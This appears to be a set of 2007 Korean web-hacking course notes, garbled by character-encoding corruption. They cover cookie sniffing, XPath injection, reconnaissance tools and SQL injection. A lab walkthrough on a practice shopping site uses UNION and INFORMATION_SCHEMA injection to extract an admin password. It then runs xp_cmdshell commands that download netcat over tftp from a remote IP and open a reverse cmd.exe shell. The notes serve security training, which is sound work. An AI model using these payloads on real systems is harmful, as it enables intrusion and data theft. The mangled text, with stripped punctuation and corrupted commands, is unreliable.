๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

User-AgentBlaBla Client

HTTP RESPONSE์˜ ์ฃผ์š” ์‘๋‹ต ์ฝ”๋“œ

์ฃผ์š” ์‘๋‹ต์ฝ”๋“œ

200 OK 400 BadRequest

201 Created 401 Unauthorized

202 Accepted 403 Forbidden

404 Not Found 301 Moved permanently

302 Found 500 Internal Server Error

HTTP ๊ด€๋ ฆ ๊ธฐ์ˆ 

์ฟ ํ‚ค

94๋…„ ๋„ท์Šค์ผ€์ดํ”„์—์„œ ๊ฐœ๋ฐœ

์„œ๋ฒ„๊ฐ€ ์ƒ์„ฑํ•˜๊ณ  ํด๋ผ์ด์–ถํŠธ์— ์ €์žฅ์‹œํ‚ค๋Š” ๋ฐฉ์‹

์ €์žฅ์˜๊ตฌ์ (Persistent๋””์Šคํฌ)๋ฐ˜์˜๊ตฌ์ (Non-Persistent ๋ฉ”๋ชจ๋ฆฌ)

๋ณด์•†๋ณด์•†๋น„๋ณด์•†

์ œํ•šํฌ๊ธฐ์ œํ•š(4k)๋ณ€์ˆ˜์ œํ•š(2k)

ํ•š๋ฒˆ ์ €์žฅ๋œ ์ฟ ํ‚ค๋Š” ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„์ด ์ง€๋‚˜์ง€ ์•Š๋Š” ํ•š ํ•ด๋‹น ๋„๋ฉ”์ธ์— ์ ‘์†์‹œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ž๋™์œผ๋กœ ํƒ‘์žฌํ•˜์—ฌ ์ ‚์†ก

ํ•˜๊ฒŒ ๋จ

์ฟ ํ‚คํŒŒ์ผํ˜•ํƒœ์‚ฌ์šฉ์ž์ด๋ฆ„์ ‘์†ํ•š์‚ฌ์ดํŠธ

์ฟ ํ‚คํŒŒ์ผ๋‚ด์šฉ๊ฐœ๋ฐœ์ž๊ฐ€ ์„ค์ •ํ•˜๊ธฐ ๋‚˜๋ฆ„

๋””ํดํŠธ ๋””๋ ‰ํ† ๋ฆฌ CDocuments and Setting์‚ฌ์šฉ์ž์ด๋ฆ„Cookies

๊ธฐ๋ณธํฌ๋งท

Set-cookie

Name=value ์ฟ ํ‚ค์˜ ์ด๋ฆ„

Expire=date ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„

Domain=domain ๋„๋ฉ”์ธ

Path=path ์ฟ ํ‚ค๋ฅผ ์ด์šฉํ•˜์—ฌ ์ ‘์†์‚ฌ๋Šฅํ•š URL

Secure ๋ณด์•†๋น„๋ณด์•†์„ค์ •

๊ด€๋ ฆ ISSUE

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘ ๋ฐ ์Šค๋‹ˆํ•‘ ํ”„๋ก์‹œ ๋“ฑ์„ ํ†ตํ•š ๋ณ€์กฐ๊ฐ€๋Šฅ

XSS๋“ฑ์„ ํ†ตํ•š ํƒ€์ธ์˜ ์ฟ ํ‚คํƒˆ์ทจ

์žฌ์ƒ๊ณต๊ฒฉ์— ๋ฌด๋ฐฉ๋น„

๋Œ€์‘๋ฐฉ์•† ์ฟ ํ‚ค๋Š” ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋Š” ๊ธฐ๋ณธ ์ฒ ์น™ ์‚ฌ์šฉํ•› ๊ฒฝ์šฐ ๊ฒ€์ฆ๋œ ์•”ํ˜ธํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์œผ๋กœ ์ตœ์†Œํ•š์˜ ์ •๋ณด๋งŒ

์ €์žฅ ์ฟ ํ‚ค์˜ ๋ฌด๊ฒฝ์„ค ๊ฒ€์‚ฌ๋ฅผ ์œ„ํ•ด ์ ‚์†ก๋˜๋Š”(ํŠน์ • ๋ณ€์ˆ˜ ๊ฐ’+TimeStamp)๋“ฑ์˜ ์ •๋ณด๋ฅผ ํ•ด์‹œํ•š ๊ฐ’๊นŒ์ง€ ๊ฐ™์ด

์ ‚์†ก ์™„๋ฒฝํ•˜์ง‚ ์•Š์œผ๋‚˜ ์„ธ์…˜๊ณผ ๊ฐ™์ด ๋ณ‘ํ–‰์‹œ ๋ณด์•†์„ฑ ํ–ฅ์ƒ

์„ธ์…˜(SESSION)

HTTP์ ‘์† ์„ธ์…˜์— ๋Œ€ํ•š ์ฒ˜๋ฆฌ๋ฅผ ๋‹ด๋‹นํ•˜๋Š” ๊ธฐ์ˆ 

Server Side ๊ธฐ์ˆ ๋กœ HTTP์˜ Stateless ํ•š ํŠน์„ฑ์„ ๋ณด์™„ํ•˜๊ธฐ ์œ„ํ•ด Uniq ํ•š ID๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ํ˜„์žฌ ์ ‘์†ํ•š ํด๋ผ์ด์–ถํŠธ์—๊ฒŒ

ํ•›๋‹นํ•ด์ฃผ๊ณ  ๊ธฐ์–ตํ•˜๋Š” ๋ฐฉ์‹

๊ณผ๊ฑฐ cookie์— ์ €์žฅํ•˜๋˜ ๋ณ€์ˆ˜ ๊ฐ’ ์„ ์ดˆ๊ธฐ ์ ‘์† ์‹œ ํ•›๋‹นํ•˜๊ฒŒ ๋จ

ํ•›๋‹นํ•š ๋ณ€์ˆ˜๋Š” ์„œ๋ฒ„์— ์ €์žฅ๋˜๋ฉฐ ํด๋ผ์ด์–ถํŠธ ์ธก ์—๋Š” ์„ธ์…˜ ID๋งŒ ๋ถ€์—ฌ๋จ

